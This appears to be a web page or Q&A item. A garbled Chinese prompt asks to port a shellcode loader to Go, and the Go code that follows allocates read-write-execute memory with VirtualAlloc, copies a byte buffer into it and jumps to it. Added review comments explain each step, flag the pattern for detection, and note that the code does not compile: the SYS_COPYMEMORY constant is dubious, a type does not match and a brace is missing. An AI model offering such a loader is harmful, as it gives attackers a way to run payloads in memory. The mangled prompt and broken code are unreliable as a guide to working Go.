将下面的代码转换成 Go 语言。内联汇编加载:使用内联汇编只能加载 32 位程序的 ShellCode,因为 64 位程序不支持写内联汇编。#pragma commentlinker sectiondataRWE 将data段的内存设置成可读可写可执行#include WindowshShellCode部分unsigned char buf =xffxd5;void main __asm lea eaxb
package main
import ( "syscall" "unsafe" )
// kernel32 is a lazy handle to kernel32.dll and virtualAlloc is the
// VirtualAlloc export resolved from it; NewLazyDLL/NewProc defer the actual
// load and lookup until the first call.
// NOTE(review): as pasted, both specs sit on one line with no separator, so
// this group does not parse; the page extraction probably collapsed the
// original line breaks.
var ( kernel32 = syscall.NewLazyDLL("kernel32.dll") virtualAlloc = kernel32.NewProc("VirtualAlloc") )
// main allocates a memory region, copies buf into it and then calls the
// region as if it were a function.
//
// buf holds only the two bytes 0xff, 0xd5 here; the buffer in the prompt
// above appears to have been elided down to its tail.
//
// NOTE(review): the listing does not build as written. memcpy is declared
// with unsafe.Pointer parameters, but addr (a uintptr) is passed as its
// first argument.
func main() { buf := []byte{0xff, 0xd5}
// Arguments: base address 0 (let the OS choose), size len(buf),
// 0x1000|0x2000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
// The second and third return values, which include the error, are
// discarded, so a failed allocation (addr == 0) is never detected.
// Detection note: memory that is writable and executable at the same time,
// written once and then called, is a pattern that endpoint monitoring
// commonly flags as in-memory code execution.
addr, _, _ := virtualAlloc.Call(0, uintptr(len(buf)), 0x1000|0x2000, 0x40)
// Copies len(buf) bytes from the Go slice into the allocated region.
memcpy(addr, unsafe.Pointer(&buf[0]), uintptr(len(buf)))
// Transfers control to addr with an argument count of zero; the result and
// error values are ignored.
syscall.Syscall(addr, 0, 0, 0, 0)
}
// memcpy is intended to copy size bytes from src to dst by passing the three
// values to a raw system call.
// NOTE(review): syscall.SYS_COPYMEMORY is not a constant I know of in Go's
// syscall package, and the function's closing brace is missing from the
// page, so this helper does not compile as shown. The call's return values
// are also ignored.
func memcpy(dst, src unsafe.Pointer, size uintptr) { syscall.Syscall6(syscall.SYS_COPYMEMORY, uintptr(dst), uintptr(src), size, 0, 0, 0)